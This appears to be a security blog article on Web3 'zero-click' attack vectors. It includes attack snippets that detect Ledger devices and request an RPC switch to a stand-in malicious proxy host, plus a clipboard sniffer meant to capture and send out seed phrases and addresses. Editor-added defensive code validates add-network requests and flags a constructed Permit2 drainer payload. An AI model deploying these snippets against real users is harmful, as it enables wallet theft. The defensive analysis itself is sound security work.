
Zero-Click Attacks: The Invisible Threat to Web3 Assets

The moment a malicious page loads in your browser, reconnaissance may already have begun, before you click, tap or sign anything

"I'm safe as long as I don't sign" is only half true. Signing is still where funds move, but the work that makes a malicious signature look legitimate starts the moment your browser loads the page: probing which wallets and devices are present, steering the wallet toward an attacker-controlled RPC node, and watching for secrets that leak through the clipboard. The vectors differ by platform, so below they are laid out for three Web3 user profiles: desktop users with hardware wallets, operators of anti-detect browser farms, and mobile users inside WebView-based in-app browsers.
[Target: Hardware Wallets & Web3 RPC]

PC & Hardware Wallets: Node Poisoning Attack

In a desktop Chromium browser, the WebUSB API lets a page talk to USB devices, but only after the user has picked the device in the browser's chooser (navigator.usb.requestDevice() on a user gesture); navigator.usb.getDevices() returns nothing for an origin that was never granted access. Silent enumeration of the USB bus therefore needs more than the API: either a permission previously granted to a dapp origin that is later compromised, or a renderer exploit chain (a V8 remote code execution bug plus a sandbox escape) that takes the attacker out of the browser's permission model altogether.

Attack Principle

Attackers don't need to crack the hardware wallet (Ledger/Trezor) itself; the device still signs only what it is shown. What they target is the data the wallet is shown: the JSON-RPC endpoint the wallet extension uses to read balances, nonces and gas. A page cannot reach into the extension's memory, but it can ask the wallet to add or switch networks (wallet_addEthereumChain / wallet_switchEthereumChain) with an attacker-controlled rpcUrl under a familiar chainId. If you approve that prompt, the hardware wallet remains properly connected while every balance, token list and transaction preview you see is served by the attacker's node: a "mirror illusion" that makes a draining transaction look routine.

exploit_usb_sniffer.js
// USB device enumeration via WebUSB, followed by an RPC-endpoint swap request.
// navigator.usb.getDevices() returns only devices this origin was already granted
// through a user-gesture requestDevice() chooser; nothing is enumerated silently.
async function sniffHardwareWallets() {
  if (!navigator.usb || !window.ethereum) return; // WebUSB is Chromium-only
  const devices = await navigator.usb.getDevices();

  for (const device of devices) {
    // Ledger USB Vendor ID: 0x2c97
    if (device.vendorId === 0x2c97) {
      console.log('[HARDWARE_DETECTED]', device.productName);

      // The page cannot write into the extension's memory. The only route to a
      // different RPC endpoint is an EIP-3085 request, which the wallet shows
      // to the user as an "add network" prompt before anything changes.
      // chainId must be a 0x-prefixed hex string, not a number.
      await window.ethereum.request({
        method: 'wallet_addEthereumChain',
        params: [{
          chainId: '0x1',
          chainName: 'Ethereum Mainnet',
          rpcUrls: ['wss://node.malicious-proxy.xyz'],
          nativeCurrency: { name: 'Ether', symbol: 'ETH', decimals: 18 },
        }],
      });
    }
  }
}

// Run once the DOM is ready
document.addEventListener('DOMContentLoaded', sniffHardwareWallets);
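The defence against this vector sits in the wallet, at the moment it receives the EIP-3085 request. Below is an added example (editor's code, not part of the original page and not any wallet's source) of the checks a wallet, or an audit script for a browser-extension build, can run on the request before showing the prompt: transport, host against a known-endpoint list, and a cross-check of the node's own eth_chainId answer. KNOWN_CHAINS, the hostnames in it and the captured JSON-RPC reply are constructed for the example; the request itself is the one from the sniffer above.

```javascript
// Validate a wallet_addEthereumChain (EIP-3085) request before prompting the user.
// KNOWN_CHAINS is a constructed allow-list for this example; a wallet would ship a
// full list (e.g. from chainid.network) and let the operator pin their own endpoints.
const KNOWN_CHAINS = {
  '0x1': { name: 'Ethereum Mainnet', rpcHosts: ['cloudflare-eth.com', 'eth.llamarpc.com'] },
  '0x89': { name: 'Polygon Mainnet', rpcHosts: ['polygon-rpc.com'] },
};

function checkAddChainRequest(params) {
  const findings = [];
  if (!params || typeof params.chainId !== 'string' || !/^0x[0-9a-f]+$/i.test(params.chainId)) {
    return { ok: false, findings: ['chainId must be a 0x-prefixed hex string'] };
  }
  const chainId = params.chainId.toLowerCase();
  const known = KNOWN_CHAINS[chainId];
  const rpcUrls = Array.isArray(params.rpcUrls) ? params.rpcUrls : [];

  if (rpcUrls.length === 0) findings.push('no rpcUrls supplied');
  if (!known) findings.push(`chainId ${chainId} is not in the allow-list; treat as unverified`);

  for (const raw of rpcUrls) {
    let url;
    try { url = new URL(raw); } catch { findings.push(`unparseable rpcUrl: ${raw}`); continue; }
    if (url.protocol !== 'https:' && url.protocol !== 'wss:') {
      findings.push(`plaintext transport ${url.protocol} for ${url.host}`);
    }
    if (known && !known.rpcHosts.includes(url.hostname)) {
      // A familiar chainId pointed at an unfamiliar node is the poisoning pattern.
      findings.push(`${url.hostname} is not a known endpoint for ${known.name} (${chainId})`);
    }
  }
  if (known && params.chainName && params.chainName !== known.name) {
    findings.push(`chainName "${params.chainName}" does not match ${known.name}`);
  }
  return { ok: findings.length === 0, findings };
}

// Second check: the node's own eth_chainId must agree with the request. The network
// call is omitted; `body` is the raw JSON-RPC response text a wallet would have fetched.
function nodeReportsChainId(body, expectedChainId) {
  let msg;
  try { msg = JSON.parse(body); } catch { return false; }
  if (msg.error || typeof msg.result !== 'string') return false;
  return BigInt(msg.result) === BigInt(expectedChainId);
}

// Constructed sample: the request issued by the sniffer above, plus a captured reply
// from a node that really serves chain 0x1.
const POISONED_REQUEST = {
  chainId: '0x1',
  chainName: 'Ethereum Mainnet',
  rpcUrls: ['wss://node.malicious-proxy.xyz'],
};
const SAMPLE_CHAIN_ID_REPLY = '{"jsonrpc":"2.0","id":1,"result":"0x1"}';

console.log(checkAddChainRequest(POISONED_REQUEST));
console.log(nodeReportsChainId(SAMPLE_CHAIN_ID_REPLY, '0x1'));
```

The eth_chainId cross-check catches a misconfigured or mistaken endpoint, not a deliberate proxy: a malicious node will happily answer 0x1 while lying about balances. The host allow-list is what catches the proxy, which is why the two checks belong together.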
[Target: Anti-Detect Browsers & Sybil Environments]

Anti-Detect Browsers: Sandbox Escape Attack

Anti-detect browsers (AdsPower, Multilogin and similar) are widely used to run many isolated wallet profiles on one machine for automation or multi-account (Sybil) farming. Their isolation is profile and fingerprint separation, not a security boundary.

Attack Principle

Profile isolation lives at the application layer: each window gets its own cookies, storage and spoofed fingerprint, but all of them run in the same browser build, on the same OS, under the same user account. A rendering-stack bug (WebGL, Canvas or another GPU-facing surface) that yields code execution, chained with a sandbox escape, puts the attacker on the host rather than in one profile. From there every profile's extension local storage is just files on disk, and any wallet that is currently unlocked holds its decryption key in process memory. One misstep in one window can therefore expose the encrypted vaults of dozens of isolated wallet accounts on the same machine, and the unlocked ones outright.

[Target: Mobile WebView & DeepLink Hijacking]

Mobile WebView: Deep Link Hijacking

On mobile (iOS/Android), and especially inside the in-app browsers of wallet and exchange apps, the page runs in a WebView with its own quirks and a permission model that differs from the desktop browser.

Attack Principle

Malicious pages probe for installed apps by pointing hidden iframes or navigations at custom URL schemes (for exchanges such as Upbit or Binance, or for local wallets); which schemes resolve tells the attacker which targets are worth impersonating, although current iOS and Android versions suppress most of that feedback. Alongside this, a clipboard sniffer polls the clipboard for addresses or mnemonic phrases. In a web page this is not silent: navigator.clipboard.readText() rejects without a user gesture (and, in Chromium, the clipboard-read permission), and Safari surfaces a paste prompt. The dangerous variant is a malicious or over-privileged native app, which on Android versions before 10 could read the clipboard from the background with no prompt at all. Whatever is captured is exfiltrated over a WebSocket the moment it appears.

mobile_clipboard_sniffer.js
// Mobile WebView probing: URL-scheme enumeration plus clipboard polling
const initMobileExploit = () => {
  // Hidden deeplink probe: a navigation to a custom scheme only goes anywhere
  // if an installed app has registered it. Current iOS and Android hide most of
  // the outcome from the page, so the signal is weak.
  const deeplinks = [
    'upbit://wallet',
    'binance://web3',
    'metamask://'
  ];

  for (const link of deeplinks) {
    const iframe = document.createElement('iframe');
    iframe.src = link;
    iframe.style.display = 'none';
    document.body.appendChild(iframe);
  }

  // High-frequency clipboard monitor. readText() requires a user gesture and,
  // in Chromium, the clipboard-read permission; otherwise the promise rejects.
  // Only a native app with clipboard access can run this loop unattended.
  setInterval(async () => {
    let text;
    try {
      text = await navigator.clipboard.readText();
    } catch {
      return; // denied: no gesture or no permission
    }
    // isSensitive() and exfilToPrivacyPool() are referenced by the page but not
    // defined: a pattern match for addresses/mnemonics and a WebSocket upload.
    if (isSensitive(text)) {
      exfilToPrivacyPool(text);
    }
  }, 500);
};

initMobileExploit();

🏁 Automated Attack Closure

Once sniffing and hijacking have identified the wallet, chain and tokens, the attacker's automated script needs exactly one thing from the victim: the next signature. A blind-signed Permit2 message is the usual target. An EIP-712 permit that names the attacker's contract as spender, with an unlimited amount and a far-future expiration, lets the attacker transfer the tokens later with no further interaction from the user. No Uniswap V4 hook, or any other contract, can move funds "without any signature": hooks run inside pool operations and still depend on an allowance from the token holder. The blind signature is that allowance. From there the loot is swapped and bridged automatically into hard-to-trace assets such as Monero (XMR) or pushed through mixers like Tornado Cash.
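The "next legitimate blind signature" is the one control point left, and it can be inspected before it is given. Below is an added example (editor's code, not from the original page, Uniswap or Permit2's authors) that takes the EIP-712 payload a dapp passes to eth_signTypedData_v4 and flags the fields that turn a Permit2 approval into a drainer grant: a domain that is not the canonical Permit2 contract, a spender outside the user's trusted-router list, an unlimited (max uint160) amount, and allowance or signature deadlines far in the future. TRUSTED_SPENDERS, the token address and the drainer payload are constructed for the example; the Permit2 address and the PermitSingle/PermitBatch field layout are the real ones.

```javascript
// Inspect a Permit2 signing request (EIP-712 typed data for eth_signTypedData_v4)
// and flag what would make the signature a standing grant to an attacker.
const PERMIT2_ADDRESS = '0x000000000022d473030f116ddee9f6b43ac78ba3'; // canonical Permit2 deployment
const MAX_UINT160 = (1n << 160n) - 1n;                                   // Permit2's "unlimited"
const THIRTY_DAYS = 30 * 86400;

// Constructed allow-list: the router(s) this user actually trades through.
const TRUSTED_SPENDERS = new Set(['0x1111111111111111111111111111111111111111']);

function inspectPermit2(typedData, nowSeconds, trusted = TRUSTED_SPENDERS) {
  const findings = [];
  const { domain = {}, primaryType, message = {} } = typedData;

  if (domain.name !== 'Permit2' || String(domain.verifyingContract).toLowerCase() !== PERMIT2_ADDRESS) {
    findings.push('domain: verifyingContract is not the canonical Permit2 contract');
  }

  // PermitSingle carries one PermitDetails; PermitBatch carries an array of them.
  let details;
  if (primaryType === 'PermitSingle') details = [message.details];
  else if (primaryType === 'PermitBatch') details = Array.isArray(message.details) ? message.details : [];
  else return { risk: 'unknown', findings: [`primaryType ${primaryType} is not a Permit2 permit`] };

  const spender = String(message.spender ?? '').toLowerCase();
  if (!trusted.has(spender)) findings.push(`spender: ${spender || '(missing)'} is not a trusted router`);

  for (const d of details) {
    if (!d) { findings.push('details: missing PermitDetails'); continue; }
    const amount = BigInt(d.amount);
    const expiration = Number(d.expiration);
    if (amount === MAX_UINT160) findings.push(`amount: unlimited allowance on token ${d.token}`);
    if (expiration - nowSeconds > THIRTY_DAYS) {
      findings.push(`expiration: allowance on ${d.token} lasts ${Math.floor((expiration - nowSeconds) / 86400)} days`);
    }
  }

  const sigDeadline = Number(message.sigDeadline);
  if (sigDeadline - nowSeconds > 3600) findings.push('sigDeadline: signature stays usable for more than an hour');

  // Wrong contract or unknown spender is a drainer pattern regardless of the rest.
  const high = findings.some((f) => f.startsWith('domain:') || f.startsWith('spender:'));
  return { risk: high ? 'high' : findings.length ? 'medium' : 'low', findings };
}

// Constructed drainer payload: real Permit2 domain, attacker-controlled spender,
// unlimited amount, both deadlines at uint48 max. The `types` section is omitted.
const DRAINER_PERMIT = {
  domain: { name: 'Permit2', chainId: 1, verifyingContract: '0x000000000022D473030F116dDEE9F6B43aC78BA3' },
  primaryType: 'PermitSingle',
  message: {
    details: {
      token: '0x2222222222222222222222222222222222222222',  // constructed token address
      amount: '0xffffffffffffffffffffffffffffffffffffffff', // 2^160 - 1
      expiration: '281474976710655',                         // 2^48 - 1
      nonce: '0',
    },
    spender: '0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef',  // not in TRUSTED_SPENDERS
    sigDeadline: '281474976710655',
  },
};

console.log(inspectPermit2(DRAINER_PERMIT, Math.floor(Date.now() / 1000)));
```

A legitimate swap permit from a dapp you are actually using scores low here: a known router as spender, an amount no larger than the trade, an expiration measured in hours or days, and a sigDeadline a few minutes out. Anything rated high should be refused outright, and a medium rating means the wallet should show the decoded fields rather than an opaque hash.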